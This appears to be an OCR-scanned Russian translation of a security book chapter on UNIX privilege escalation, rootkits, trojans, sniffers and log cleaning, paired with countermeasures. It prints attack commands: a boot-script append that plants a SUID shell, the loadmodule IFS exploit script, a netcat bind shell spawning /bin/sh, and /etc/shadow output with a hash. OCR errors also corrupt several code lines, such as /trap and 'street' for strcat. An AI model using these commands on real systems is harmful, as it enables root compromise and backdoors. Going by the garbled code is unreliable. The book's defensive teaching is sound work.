    В качестве примера можно привести изъян программы in.telnetd, описанный в статье СА-95.14 координационного центра CERT. Этот изъян, конечно, был обнаружен довольно давно, но он как нельзя лучше подходит для иллюстрации рассултри-ваемой проблемы. Суть изъяна заключается в том, что некоторые версии in. telr.e.i позволяют передавать удаленной системе переменные окружения, когда пользователь пытается установить соединение (RFC 1408 и 1572). Таким образом, взломщик может модифицировать свою переменную LD_PRELOAD, подключившись к системе с помощью telnet, и получить доступ в качестве суперпользователя.
    Для того чтобы извлечь пользу из данного изъяна, взломщику необходимо каким-либо способом поместить модифицированную совместно используемую библиотеку на взламываемую систему. Затем он может модифицировать переменную LD_PRELOAD таким образом, чтобы она указывала на модифицированную библиотеку при подключении. Когда сервер in. telnetd запускает программу /bin/login для аутентификации пользователя, динамический компоновщик системы загрузит модифицированную библиотеку, а не стандартную. Это позволит взломщику выполнить код с привилегиями суперпользователя.

    Контрмеры: защита совместно используемых библиотек



    При зафузке модулей с установленным флагом SU1D суперпользователя динамические компоновщики должны игнорировать значения переменной окружения LD_PRELOAD. Пуристы могут возразить, что совместно используемые библиотеки должны быть хорошо написаны и нет никакой опасности в том, что они указаны в переменной LD_PRELOAD. В действительности же в этих библиотеках могут оказаться ошибки, снижающие безопасность системы при выполнении кода, хранящегося в библиотеке, в контексте SUID. Более того, защищать совместно используемые библиотеки (например, /usr/lib или lie) нужно также тщательно, как и самые важные файлы. Если взломщик сможет получить доступ к /usr/lib или /lib, система станет абсолютно беззащитной.

    Изъяны ядра



    Не секрет, что UNIX является очень сложной и надежной операционной системой. Из-за сложности в UNIX и других мощных операционных системах неизбежно имеются определенные программные ошибки. В UNIX наиболее опасный недостаток связан с самим ядром. Ядро представляет собой внутренний компонент операционной системы, в котором реализована общая модель ее подсистемы защиты. Эта модель обеспечивает обработку разрешений на использование файлов и каталогов, расширение и отключение привилегий файлов SUID, обработку сигналов и т.д. Если слабое место появляется в самом ядре, то под угрозой оказывается безопасность всей операционной системы в целом.
    В качестве примера можно привести изъян ядра, обнаруженный в июне 2000 года, который оказал влияние на миллионы систем. Он имеется в ядре большинства версий системы Linux 2.2.x, разработанных до этого момента. Этот изъян связан с реализацией требований стандарта POS1X в ранних версиях ядра Linux. Реализованные возможности были призваны обеспечить более высокую степень управляемости, чем предоставлялась привилегированными процессами. Если говорить кратко, то все новые возможности были разработаны для повышения безопасности всей системы в целом. К сожалению, из-за ошибок в программировании оказалось, что новые функции работают не так, как планировалось. Этот изъян позволяет ввести в заблуждение программы SUID (например, sendmail) и назначить для них более высокие привилегии, чем те, которые им действительно необходимы. Таким образом, злоумышленник, который имеет доступ к командной оболочке взламываемой системы, может расширить эти привилегии до уровня root.

    Контрмеры: защита ядра



    Описанный изъян имеет место во многих системах Linux. Поэтому соответствующий модуль обновления системному администратору нужно установить в первую очередь. К счастью, это очень просто осуществить. Для тех, кто использует ядро версии 2.2.x, достаточно просто обновить его до версии 2.2.16 или более высокой.

    Неправильная настройка системы



    В предыдущих разделах мы описали часто встречаемые изъяны, а также методы, с помощью которых злоумышленники могут воспользоваться этими недоработками и получить привилегированный доступ. Перечень таких изъянов и соответствующих методов достаточно велик, однако в распоряжении взломщиков имеется гораздо больше методов взлома, чем можно было бы предположить исходя из такого перечня. Это объясняется тем, что зачастую нарушение безопасности происходит не только и не столько из-за наличия технических дефектов в системе защиты, сколько из-за недостаточно тщательной настройки и неэффективных методов администрирования. Операционная система может быть сама по себе очень безопасной и надежной, но если системный администратор изменит права доступа к файлу /etc/passwd, открыв его для всеобщего доступа, все остальные меры по защите данных могут оказаться бесполезными. Именно этот человеческий фактор и недооценивается в большинстве случаев.

    Права доступа к файлам и каталогам



    Простота и мощь системы UNIX основывается на реализованном в ней механизме использования файлов. Независимо от того, являются ли они двоичными исполняемыми программами, текстовыми конфигурационными файлами или устройствами, все эти объекты представляют собой файлы с соответствующими правами доступа. Если система разрешений недостаточно хорошо реализована или намеренно изменена администратором, безопасность системы может быть значительно снижена. Ниже описаны два самых распространенных недостатка в процедурах администрирования, которые заключаются в установке для файлов флага SUID, а также в создании файлов, общедоступных для записи. Из-за ограничений на объем книги проблемы обеспечения безопасности устройств (/dev) подробно не рассматриваются, однако это вовсе не означает, что к ним можно применять менее строгие защитные меры. Злоумышленник, который может создавать устройства или получать права чтения/записи важнейших системных ресурсов, таких как /dev/kmem, практически гарантированно сможет получить доступ на уровне суперпользователя.

    Файлы SUID



    Установка для файлов бита SUID или SGID — смертельно опасна. Этим все сказано! Ни один другой файл системы UNIX не подвержен столь частым попыткам злоумышленников всех мастей получить несанкционированный доступ, как файл с SUID суперпользователя. Практически во всех описанных выше случаях взлома были задействованы те или иные процессы, выполняющиеся на уровне привилегий суперпользователя, — большинство из них уже имели установленный бит SUID. Переполнение буфера, гонки на выживание и взлом с использованием символьных ссылок никогда не принесут ожидаемого эффекта, если для программы не установлен флаг SUID. К сожалению, большинство разработчиков относятся к биту SUID так, как будто это вышедшая из моды вещь. Пользователи, не заботящиеся о безопасности, также заражаются таким образом мышления. Многие из них слишком ленивы для того, чтобы предпринимать какие бы то ни было дополнительные меры при выполнении работы и склонны полагать, что все программы должны выполняться с уровнем привилегий суперпользователя.
    Для того чтобы воспользоваться столь печальным отношением к безопасности, взломщик, получивший доступ к системе на уровне пользователя, должен сначала попытаться идентифицировать файлы с установленными битами SU1D и (или) GUID. Для этого обычно используется утилита find, позволяющая получить список файлов, с помощью которых можно попытаться получить доступ на уровне суперпользователя. Давайте рассмотрим пример поиска таких файлов в относительно простой системе Linux (для наглядности полученные результаты были сокращены).

    [tsunami]# find / -type f -perm -04000 -Is
    -rwsr-xr-x i root root 30520 May 5 1998 /usr/bin/at
    -rwsr-xr-x 1 root root 29928 Aug 21 1998 /usr/bin/chage
    -rwsr-xr-x 1 root root 29240 Aug 21 1998 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 770132 Oct 11 1998 /usr/bin/dos
    -r-sr-sr-x 1 root root 13876 Oct 2 1998 /usr/bin/lpq
    -r-sr-sr-x 1 root root 15068 Oct 2 1998 /usr/bin/lpr
    -r-sr-sr-x 1 root root 14732 Oct 2 1998 /usr/bin/lprm
    -rwsr-xr-x 1 root root 42156 Oct 2 1998 /usr/bin/nwsfind
    -r-sr-xr-x 1 root bin 15613 Apr 27 1998 /usr/bin/passwd
    -rws--x--x 2 root root 464140 Sep 10 1998 /usr/bin/suidperl

    Большинство из перечисленных в листинге программ (например, chage и passwd) для корректной работы требуют наличия привилегий SUID. Скорее всего, взломщики сосредоточат свои усилия на таких программах, особенно на тех из них, которые уже взламывались в прошлом или слишком сложны, а следовательно, вероятность того, что в них имеются недостатки и ошибки, достаточно высока. Хорошей отправной точкой является программа dos. Эта программа создает виртуальную машину и для выполнения некоторых операций требует прямого доступа к аппаратным средствам. Прежде всего взломщики обращают внимание на те программы, которые выполняют нетривиальные операции или не находятся под таким жестким контролем, как другие SUID-программы. Давайте проведем небольшое исследование и попробуем определить, насколько программа dos пригодна для взлома. Для этого обратимся к документации HOWTO. Наша цель в данном исследовании — определить, имеются ли в этой программы дефекты, проявляющиеся в тех случаях, когда она запускается в контексте SUID. Если ответ будет положительным, значит, она предстаатается хорошим кандидатом для взлома.
    В документации HOWTO по программе dos сказано следующее. "Хотя dosemu отключает привилегии root везде, где это возможно, безопаснее не запускать ее от имени суперпользователя, особенно если вы планируете запускать под ее управлением программы DPMI. Большинство обычных программ DOS не требует запуска dosemu от имени суперпользователя, особенно если она запускается в среде X. Поэтому во всех случаях, когда это возможно, вы не должны позволять пользователям запускать копии dosemu в контексте SUID суперпользователя, а лишь в контексте обычного пользователя. Этот режим можно настроить на уровне пользователей, используя файл /etc/dosemu.users."
    Таким образом, в документации однозначно говорится о том, что пользователям рекомендуется запускать копию программы без установленного флага SUID. На нашей тестовой системе такие ограничения не применялись, о чем мы узнали из файла /etc/dosemu.users. Данный пример некорректной настройки демонстрирует именно то, к чему стремится любой злоумышленник: в системе имеется файл, с помощью которого с высокой степенью вероятности можно получить доступ на уровне суперпользователя. Злоумышленник может воспользоваться программой dos с установленным битом SUID как для непосредственного взлома, так и для определения того, можно ли с ее помощью применить такие методы, как переполнение буфера, использование символьных ссылок и так далее для взлома других программ. Это можно назвать классическим примером того, как программа, обладающая ничем не оправданным уровнем привилегий SUID, подвергает значительному риску безопасность всей системы.

    Контрмеры: защита от взлома с использэванием SUID-файлов



    Лучшей мерой по защите от взлома, основанного на использовании SUID/SGID-файлов, является сброс флага SUID/SGID у как можно большего количества файлов. Исчерпывающий список файлов, которые не должны иметь такого бита, привести трудно в связи с большими различиями в версиях UNIX разных разработчиков. Поэтому любой перечень, который мы могли бы представить в данной книге, почти наверняка окажется неполным. Можем лишь посоветовать провести инвентаризацию всех SUID/SGID-файлов и проверить, действительно ли необходимо, чтобы тот или иной файл имел привилегии на уровне суперпользователя. Для этого вы можете использовать метод, который применяют взломщики, когда хотят найти SUID/SGID-файлы. С помощью следующей команды можно найти все SUID-файлы.
     find / -type f -perm -04000 -ls
    Для поиска SGID-файлов можно воспользоваться следующей командой, 
    find / -type f -perm -02000 -ls
    Подготовив список файлов, обратитесь к интерактивной справочной системе (man), документации и справке HOWTO, чтобы выяснить, рекомендуется ли в этих источниках удалить бит SUID того или иного файла. Проделав такую работу, вы будете удивлены, узнав, как много файлов не нуждается в привилегиях SUID/SGID. Конечно, прежде чем приступить к написанию сценария, удаляющего бит SUID/SGID у всех найденных файлов, необходимо проверить на тестовой системе, как это повлияет на работоспособность программ. Помните, что в каждой системе все-таки имеется несколько программ, которым для выполнения их функций нужны привилегии суперпользователя.

    Общедоступные для записи файлы



    Еще одной типичной ошибкой в настройке является разрешение записи в важные файлы всем пользователям. Как и в случае файлов SUID, общедоступные для записи файлы создаются для удобства работы. Однако за это приходится расплачиваться понижением уровня защиты важной информации. Если администратор не замечает очевидных недостатков, то злоумышленники, как правило, находят их очень быстро. К файлам, которые часто открывают для всеобщего доступа, относятся системные файлы инициализации, важные системные конфигурационные файлы и пользовательские файлы запуска. Давайте рассмотрим некоторые примеры того, как взломщик может воспользоваться общедоступными для записи файлами, find / -perm -2 -type f -print
    Данный синтаксис команды find позволяет найти общедоступные для записи файлы.

    /etc/rc.d/rc3.d/S991ocal
    /var/tmp
    /var/tmp/.Xll-unix
    /var/tmp/.Xll-unix/XO
    /var/tmp/.font-unix
    /var/lib/games/xgaIscores
    /var/lib/news/innd/ctlinnda28392
    /var/lib/news/innd/ctlinndal8685
    /var/spool/fax/outgoing
    /var/spool/fax/outgoing/locks
    /home/public

    Итак, даже беглого взгляда на полученные результаты достаточно, чтобы сделать вывод о наличии серьезных проблем. В частности, файл /etc/re.d/rc3.d/S991ocal является общедоступным для записи сценарием. Данная ситуация чрезвычайно опасна, поскольку при запуске системы этот сценарий выполняется с привилегиями суперполъзователя. Например, взломщик может создать экземпляр командной оболочки, работающей в контексте SU1D, которая будет запущена при следующем запуске системы. Для этого ему достаточно добавить в файл сценария следующую команду.

    [tsunami]$ echo "/bin/cp /bin/sh /trap/.sh ;
    /bin/chmod 4755 /tmp/.sh"
    \
    /etc/re.d/rc3.d/S991ocal

    При следующей перезагрузке системы в каталоге /tmp будет создан SUID-экземпляр командной оболочки. Второй возможный метод взлома заключается в использовании каталога /home/public. Поскольку он открыт для записи, с помощью команды mv взломщик может перезаписать любой файл из этого каталога. Это оказывается возможным, поскольку права доступа к каталогу перекрывают права доступа к отдельным файлам этого каталога. Скорее всего, типичный взломщик перепишет файлы запуска пользовательских экземпляров командной оболочки (например. . login или .bashrc), в которых будет создан файл SUID. После того как кто-нибудь использует учетную запись public для регистрации в системе, командная оболочка с правами суперпользователя будет ожидать взломщика.

    Контрмеры: защита общедоступных для записи файлов



    Регулярный поиск всех общедоступных для записи файлов является хорошей практикой системного администратора. Измените права записи для всех найденных каталогов и файлов, которые не должны быть общедоступными. Конечно, решение о том, нужно ли тот или иной файл или каталог делать общедоступным, иногда принять довольно сложно, поэтому мы рекомендуем исходить хотя бы из здравого смысла. Если этот файл используется при инициализации, конфигурации или запуске системы, то, скорее всего, он не должен быть общедоступным. Однако помните, что файлы драйверов некоторых устройств, находящиеся в папке /dev, должны быть общедоступными. Поэтому применяйте взвешенный подход к вносимым изменениям и тщательно тестируйте работоспособность системы после каждого существенного изменения.
    Обсуждение дополнительных атрибутов файлов выходит за рамки данной книги, но все же эта возможность заслуживает того, чтобы упомянуть о ней хотя бы в двух словах. Безопасность многих систем можно существенно повысить, установив для определенных ключевых файлов флаги read-only, append и immutable. В Linux и многих вариантах BSD имеются дополнительные флаги, которые, к сожалению, очень редко используются (в Linux для работы с ними предназначена команда chattr). Применяя эти дополнительные атрибуты совместно со средствами защиты на уровне ядра (в тех системах, в которых они поддерживаются), можно существенно повысить уровень безопасности системы.

    Взлом командной оболочки



    Командная оболочка UNIX представляет собой очень мощную программу, которая обеспечивает удобную работу пользователей. Одной из главных отличительных особенностей окружения командной оболочки UNIX является возможность программировать команды, а также устанавливать определенные параметры, влияющие на работу самой командной оболочки. Конечно же, как часто бывает в подобных ситуациях, богатые возможности имеют и обратную сторону, проявляющуюся в наличии многочисленных слабых мест с точки зрения обеспечения безопасности. Одним из самых популярных методов взлома является использование переменной IFS (Internal Field Separator).

    Взлом IFS



    Переменная IFS предназначена для отделения друг от друга слов, используемых в окружении командной оболочки. Обычно значением переменной IFS является символ пробела, который служит для разделения команд по умолчанию. Манипулируя переменной IFS, взломщик может запустить с помощью какой-нибудь SUID-программы "троянского коня" и получить, таким образом, привилегии суперпользователя. Обычно в этих целях используется сценарий командной оболочки с установленным флагом SUID, однако в рассматриваемом примере мы воспользуемся программой loadmodule.
    Программа взлома loadmodule широко известна. Она была создана несколько лет назад и основана на использовании изъяна SunOS 4.1.x, связанного с переменной IFS. 

    #!/bin/csh
    cd /trap
    mkdir bin cd bin cat > bin « EOF<R #!/bin/sh
    sh -I
    EOF
    chmod 755 /tmp/bin/bin
    setenv IFS /
    /usr/openwin/bin/loadmodule
    /sys/sun4c/OBJ/evqmod-sun4c.о
    /etc/openwin/modules/evqload

    Данный сценарий взлома делает текущим каталог /tmp и создает в нем дочерний каталог /bin. Как это зачастую бывает, создается копия /bin/sh, которая вскоре будет запущена. Затем для переменной IFS в сценарии устанавливается значение / вместо символа пробела. Поскольку в переменной 1FS содержится значение /, то SUID-программа loadmodule, ничего не подозревая, запускает на выполнение программу /tmp/bin/bin. В результате создается копия командной оболочки с привилегиями суперпользователя, которой взломщику остается лишь воспользоваться.

    Контрмеры: защита переменной IFS



    При взломе с использованием переменной IFS в большинстве случаев мишенью злоумышленников является системная функция system(). Вызов этой функции используется в оболочке sh для анализа командной строки перед ее выполнением Для того чтобы избежать возможных злоупотреблений, можно применить простую программу, которая автоматически устанавливает в качестве значения переменной IFS символ пробела. Ниже приведен пример такой программы, код которой предоставил Джереми Рауч (Jeremy Rauch). 

    #define EXECPATH "/usr/bin/real/"
    main(int argc, char **argv)
    { char pathname[1024]; if (strlen(EXECPATH)
    + strlen(argv[0]) + l> 1024)
    exit(-1);
    strcpy(pathname, EXECPATH);
    street(pathname, argv[0]);
    putenv("IFS= \n\t");
    execv(pathname, argv, argc);
    }

    К счастью, большинство современных версий UNIX игнорирует значение переменной IFS, если командная оболочка работает с привилегиями суперпользователя, а ее эффективный UID отличается от реального UID. В качестве совета можно еше pas подчеркнуть, что не нужно создавать сценарии с привилегиями SUID, а количество SUID-файлов свести к минимуму.


    4.gif

    Изображение: 

    11. Права root получены — что дальше?



    Права root получены — что дальше?


    Когда уровень адреналина, выброшенного при попытках получить доступ в качестве суперпользователя, возвращается к норме, у взломщика начинается реальная работа. Он будет открывать и просматривать все файлы в поисках интересующей его информации, устанавливать программы перехвата паролей регистрации, telnet, ftp, smtp и snmp, а затем начнет охоту за новой жертвой, используя ваш компьютер в качестве плацдарма. Однако все эти действия предсказуемы и, как правило, сводятся к размещению на взломанном компьютере "набора отмычек" (rootkit).

    Отмычки



    Поскольку взломанная система представляет собой ценность для злоумышленника прежде всего как плацдарм для проникновения в другие компьютеры, для него очень важно разместить на взломанной машине и как можно лучше спрятать свой "набор отмычек". Такой набор для системы UNIX обычно состоит их четырех групп инструментов, адаптированных под конкретную платформу и версию операционной системы: (1) программы типа "троянский конь", например такие, как измененные версии login, netstat и ps; (2) программы, предназначенные для создания "потайных ходов", например, вставки inetd; (3) программы перехвата потока данных в сети; (4) программы очистки системных журналов.


    12. Программы типа "троянский конь"



    Программы типа "троянский конь"


    После того как взломщик получит права суперпользователя, он может "троянизировать" практически любую команду операционной системы. Именно поэтому так важно проверять размер, а также дату и время создания и модификации всех двоичных файлов, особенно тех, которые используются чаще всего,— login, su, telnet, ftp, passwd, netstat, ifconfig, Is, ps, ssh, find, du, df, sync, reboot, halt, shutdown и т.д.
    Например, часто используемым "троянским конем", входящим во многие комплекты отмычек, является "препарированная" версия программы login. Эта программа не только осуществляет регистрацию пользователей в системе, как и обычная команда login, но еще и записывает имена пользователей и пароли в отдельный файл. Существует также "препарированная" версия ssh, которая также выполняет подобные операции.
    Другие программы типа "троянский конь" создают потайные ходы в систему, запуская программы, ожидающие поступления определенных данных через порт TCP и, в случае поступления таких данных, предоставляющие скрытый доступ к командной оболочке UNIX. Например, команда Is может проверять наличие ранее запущенных "троянских коней" и, если таковых не обнаруживается, запускать специальным образом подготовленную программу netcat, которая, в свою очередь, запустит оболочку /bin/sh, как только злоумышленник подключится к определенному порту. Например, в следующем примере показано, как программа netcat, запушенная в фоновом режиме, настраивается на прослушивание порта TCP с номером 222, а после подключения устанавливает ответный сеанс с помощью /bin/sh.

    [tsunami]! nohup nc -1 -p 222 -nw -e /bin/sh &
    listening on [any] 222 ...

    Когда злоумышленник подключится к порту TCP 222, он увидит следующую информацию.

    [rumble]# nc -nw 24.8.128.204 222
    (UNKNOWN) [192.168.1.100] 222 (?) open

    Это означает, что у него имеются все права суперпользователя и он может выполнить любую операцию, для которой нужно обладать привилегиями root, как например, показанную ниже.

    cat /etc/shadow
    root:ar90alrR10r41:10783:0:99999:7:-l:-l:134530596
    bin:*:10639:0:99999:7:::
    daemon:*:10639:0:99999:7:::
    adm:*:10639:0:99999:7:::

    Количество потенциальных методов внедрения "троянских коней" зависит лишь от воображения злоумышленника (которое, как правило, является весьма богатым и изощренным). Некоторые из возможных методов более подробно описаны в главе 14.
    Постоянный мониторинг и тщательная инвентаризация всех открытых портов может воспрепятствовать попыткам нарушений безопасности такого рода, однако лучшим методом является предупреждение возможности модификации двоичных файлов.

    Контрмеры: защита от "троянских коней"



    Обнаружить программы типа "троянский конь" без соответствующих средств подчас довольно трудно. Возлагать надежды на стандартные методы, основанные на размере и дате, не приходится, поскольку опытный взломщик может создать файл, который будет иметь такой же размер, как и исходный, а также те же время и дату. Более эффективным является, например, метод, основанный на использовании программы, определяющей криптографическую контрольную сумму, с помощью которой для каждого исполняемого файла создается уникальная цифровая подпись. Эти подписи должны храниться в защищенном, недоступном для посторонних месте, например на дискете, находящейся в сейфе в специальном помещении. Программы, подобные Tripwire (http://www.tripwire.com) и MDSsum, являются одними из самых популярных в этой категории. Они позволяют записывать уникальные подписи всех программ и однозначно обнаруживать случаи модификации исполняемых файлов злоумышленниками. Очень часто администраторы пренебрегают подсчетом контрольных сумм до тех пор, пока не выявят попыток вторжения. Очевидно, что такое решение нельзя считать идеальным. К счастью, в состав некоторых систем входят пакеты, в которых изначально встроены строгие атгоритмы хэширования. Например, во многих версиях Linux используется формат RPM (RedHat Package Manager). В спецификации RPM определен также алгоритм подсчета контрольных сумм с использованием протокола MD5. Как же все эти средства помогают противостоять опасности вторжения? С помошью проверенной копии утилиты rpm можно сгенерировать запрос к пакету, который не подвергся взлому, и получить информацию о том, были ли изменены связанные с ним двоичные файлы.

    [@shadow]# rpm -Vvp ftp://ftp.redhat.com/pub/redhat/\
    redhat-6.2/i386/RedHat/RPMS/fileutils-4.0-21.i386.rpm

    S.5....T /bin/Is

    В приведенном примере /bin/Is предстаапяет собой часть пакета утилит для работы с файлами системы RedHat 6.2. Как видно из полученных данных, файл /bin/Is был изменен (5). Это означает, что контрольная сумма двоичного файла и пакета MD5 отличается. А это является верным признаком присутствия злоумышленника.
    Для систем Solaris полную базу данных контрольных сумм MD5 можно получить по адресу http://sunsolve.sun.com/pub-cgi/fileFingerprints.pl. Эта база данных поддерживается компанией Sun. Если вы являетесь администратором системы Solaris, то она окажется чрезвычайно полезной.
    Конечно, если ваша система оказалась взломанной, не пытайтесь восстановить ее с резервных копий: они наверняка также окажутся инфицированными. Для того чтобы корректно восстановить систему, ее необходимо полностью перестроить, воспользовавшись исходными носителями информации.

    Анализаторы сетевых пакетов



    Если злоумышленник проник в вашу систему в качестве суперпользователя — это плохо, но, возможно, еще хуже, если кто-то установил на каком-либо сетевом узле утилиту перехвата сетевых пакетов. Такие программы, называемые также анализаторами сетевых пакетов (sniffer; это название стало нарицательным от названия получившей всеобщее признание программы сетевого мониторинга, разработанной компанией Network General, которая в настоящее время является подразделением Network Associates, Inc.), можно без преувеличения назвать самыми опасными инструментами в руках злоумышленника. Это объясняется тем, что анализаторы позволяют взломщику наносить удары практически по любому компьютеру, который отправляет данные на взломанный узел, а также проникать на другие узлы сегмента локальной сети и делать с ними практически все, что заблагорассудится.

    Что такое анализатор сетевых пакетов



    Анализаторы изначально были разработаны как средство решения сетевых проблем. Они могут перехватывать, интерпретировать и сохранять для последующего анализа передаваемые по сети пакеты. Это дает возможность сетевым инженерам наблюдать за тем, как данные передаются по линиям связи, и устранять возникающие проблемы либо моделировать те или иные ситуации, наблюдая за прохождением пакетов на самом низком уровне. Ниже приведен пример перехвата пакетов — запись команд регистрации пользователя guest с паролем guest в сети. 

    -----[SYN] (slot 1)
    рс6 => targets [23]
    %&& #'$ANSI"!guest
    guest Is
    cd / Is
    cd /etc
    cat /etc/passwd
    more hosts.equiv
    more /root/.bash_history

    Как и многие другие мощные средства, изначально предназначавшиеся для администрирования, с течением времени анализаторы стали применяться совсем для других целей. Можно только представить, сколько важных данных проходит за день по загруженной сети! Среди таких данных — пользовательские имена и пароли, конфиденциальные сообщения электронной почты, файлы, содержащие личную информацию, деловые отчеты и т.д. Так или иначе, если информация такого рода передается по сети, она преобразуется в биты и байты, которые с помощью анализатора могут видеть взломщики, подключившиеся в любой точке маршрута прохождения данных от отправителя до получателя.
    Хотя мы подскажем, как можно защитить сетевые данные от посторонних глаз, мы надеемся, что вы поняли, почему анализаторы сетевых пакетов считаются одним из самых опасных средств, которые только могут оказаться в руках злоумышленников. Ничто не может быть безопасным в сети, в которой установлен анализатор, поскольку данные, передаваемые по линии передачи данных, по существу, всегда оказываются открытыми. Нашим любимым анализатором сетевых пакетов является dsniff (http://www.monkey.org/~dugsong/), который можно найти по адресу http://packetstorm.securify.com/sniffers/. Там же вы найдете и много других популярных программ-анализаторов.

    Как работают анализаторы



    Самый простой метод ознакомления с принципами работы анализаторов состоит в изучении тех анализаторов, которые ориентированы на сеть Ethernet. Конечно, анализаторы существуют практически для всех типов сетей, но, поскольку архитектура Ethernet является самой распространенной, давайте сосредоточимся именно на ней. Те же самые принципы, как правило, применимы и к сетям с другой архитектурой.
    Анализатор Ethernet — это программа, которая работает на уровне сетевого адаптера (NIC — Network Interface Card) и скрытно перехватывает весь поток проходящих через него данных, в том числе и те, которые не предназначены для узла, на котором этот сетевой адаптер установлен. Правда, обычно сетевой адаптер Ethernet отбрасывает все данные, не предназначенные именно ему, а также отправленные по адресу широковещательной рассылки, поэтому его нужно перевести в специальное состояние, называемое промискуитетным режимом (promiscuous mode), позволяющее получать все пакеты, проходящие по сети.
    Как только аппаратные средства будут переключены в промискуитетный режим, программа-анализатор может перехватывать и анализировать любые данные, передаваемые по локальному сегменту Ethernet. Это слегка ограничивает возможности анализатора, поскольку он не может просматривать поток данных, передаваемый за пределы локального домена (другими словами, за пределы маршрутизаторов, коммутаторов и других устройств сегментации). В связи с этим очевидно, что анализатор, установленный на магистральной линии связи, обеспечивающей взаимодействие отдельных подсетей, или в другой точке соединения подсетей, сможет перехватить гораздо больше информации, чем тот, который помещен в выделенный сегмент Ethernet.
    Теперь, получив общие сведения о принципах функционирования анализатора, давайте рассмотрим некоторые популярные анализаторы, а также познакомимся со способами их обнаружения.

    Популярные анализаторы



    В табл. 8.2 приведен не претендующий на полноту перечень инструментальных средств, с которыми нам приходилось сталкиваться и работать чаще всего на протяжении всех тех лет, которые мы посвятили деятельности по оценке уровня безопасности сетей.

    Таблица 8.2. Популярныебесплатные анализаторы сетевых пакетов для UNIX

    Название, авторы
    Адрес
    Описание
    Sniffit, Brecht Claerhout (известен также под псевдонимом coder)
    http://reptile.rug.ac.be/-coder/snif fit/sniff it.html
    Простой анализатор пакетов, работающий в Linux, SunOS, Solaris, FreeBSD и Irix
    tcpdump 3.x, Steve McCanne, Craig Leres, Van Jaconson
    http ://www-nrg.ее.lbl.gov/
    Классическое средство анализа пакетов, которое было перенесено на многие платформы
    linsniff, MikeEdulla
    http : / /www.root shel1.com/
    Предназначен для перехвата паролей Linux
    solsnif f , Michael R. Widner
    http://www.rootshell.com/
    Тот же анализатор, модифицированный для систем Solaris 2.x компании Sun
    dsniff
    http: //www.monkey.org/ -dugsong
    Один из наиболее мощных анализаторов
    snort
    http : / /www. snort.org
    Очень мощный анализатор

    Контрмеры: защита от анализаторов



    Существует три основных подхода к защите от анализаторов, которые могут быть внедрены в вашу сеть или уже внедрены в нее.
    Переход на сеть с коммутируемой топологией
    Сети Ethernet с совместно используемыми линиями связи чрезвычайно уязвимы для анализаторов, поскольку все данные передаются по сети от узла к узлу в виде широковещательных сообщений, попадая таким образом не только на тот компьютер, которому они предназначены, но и на остальные компьютеры сегмента. Сети Ethernet с коммутируемой топологией позволяют поместить каждый узел в отдельный домен разрешения конфликтов, поэтому на сетевой адаптер того или иного узла такой сети поступают только те данные, которые предназначены этому узлу (ну и, конечно, данные, рассылаемые широковещательно). Кроме безопасности, коммутируемые сети позволяют увеличить и производительность. Учитывая, что стоимость сетевого оборудования для коммутируемых сетей не намного превышает стоимость оборудования для сетей с общей шиной, выбор последней не может быть оправдан никакими соображениями. Если бухгалтерский отдел вашей компании все же имеет иную точку зрения на эту проблему, покажите им список их паролей, перехваченных с помощью одной из приведенных выше программ. Мы уверены, что это подействует.
    Несмотря на то что сеть с коммутируемой топологией позволяет предотвратить атаки неопытных взломщиков, другие злоумышленники могут без проблем прослушивать локальную сеть. Программа типа arpredirect из пакета dsniff (http://www.monkey.org/~dugsong/dsniff/) может свести на нет все старания обеспечить безопасность с реализацией коммутируемой сетевой топологии. Более подробно программа arpredirect рассматривается в главе 10.

    Обнаружение анализаторов



    Существует два основных подхода к обнаружению анализаторов — на уровне узла и на уровне сети. На уровне узла самый простой метод заключается в определении того, работает ли сетевой адаптер системы в промискуитетном режиме. В системе UNIX для ответа на этот вопрос можно воспользоваться несколькими программами, включая программу Check Promiscuous Mode (cpm), разработанную специалистами университета Carnegie Mellon University (эту программу можно найти по адресу ftp://info.cert.org/pub/tools/).
    Кроме того, анализаторы отображаются в списке активных процессов и со временем, как правило, приводят к созданию файлов журналов огромного объема. Поэтому довольно простой сценарий UNIX, в котором используются команды ps, Isof и grep, может обнаружить деятельность, напоминающую работу анализатора. Однако, учитывая то, что опытные взломщики обычно стараются как можно тщательнее замаскировать процесс анализа сетевых пакетов, а также скрыть журналы в специально созданном скрытом каталоге, данный подход нельзя назвать очень эффективным.
    Методы обнаружения анализаторов на уровне сети очень долго существовали только теоретически. Лишь относительно недавно они были реализованы в виде программного обеспечения. К таким средствам относится программа AntiSnifT, разработанная группой исследования безопасности L0pht (http://www.10pht.com/). К сожалению, ее первая версия работает только под управлением системы Windows, однако технические комментарии достаточно подробны для того, чтобы создать центральный пункт, из которого можно выполнять сканирование всей сети и осуществлять в ней поиск находящихся в промискуитетном режиме сетевых адаптеров. Кроме программы AntiSnifT, в системе UNIX можно запустить программу sentinel (http://www.packetfactory. -net/Projects/Sentinel/), которая предоставляет дополнительные возможности поиска анализаторов на уровне сети.

    Шифрование (SSH, IPSec)



    Давно известным методом борьбы с прослушиванием сетей является шифрование. Только шифрование на уровне получателя и отправителя может обеспечить уровень практически полной конфиденциальности. Необходимая длина ключа должна определяться на основании того, как долго данные остаются важными. Короткие ключи (длиной до 40 бит) допустимо использовать для шифрования потоков данных только в тех случаях, когда данные быстро устаревают. Кроме того, применение коротких ключей позволяет повысить производительность.
    В тех случаях, когда в системе UNIX необходимо обеспечить безопасное удаленное подключение к сети, используется протокол Secure Shell (SSH). Бесплатные версии соответствующего программного обеспечения для некоммерческого использования можно найти по адресу http://www.ssh.org/download.html, а коммерческую версию, названную F-Secure Tunnel & Terminal, которая распространяется компанией Data Fellows, — по адресу http: //www.datafellows .com/.
    В настоящее время в качестве нового стандарта предлагается протокол IPSec (IP Security Protocol), который позволяет обеспечить аутентификацию и шифрование потока данных на уровне протокола IP. Десятки компаний-разработчиков уже реализовали поддержку IPSec в своих продуктах, так что обратитесь к своему поставщику сетевого оборудования и получите у него все необходимые сведения по этому вопросу. Пользователи Linux могут обратиться по адресу http://www.freeswan.org/intro.html, где содержатся данные о проекте FreeSWAN, и получить всю информацию о свободно распространяемой реализации протоколов IPSec и IKE, которая была разработана в рамках модели открытого кода.

    Очистка системных журналов



    Не желая предоставлять вам (а тем более — правоохранительным органам) каких-либо сведений о факте получения доступа к системе, взломщик, как правило, постарается очистить системные журналы от следов своего присутствия. В настоящее время существует много утилит очистки журналов, которые в большинстве случаев входят в набор отмычек. К таким программам, в частности, относятся zap, wzap, wted и remove. Однако обычно вполне достаточно даже простого текстового редактора, такого как vi или emacs.
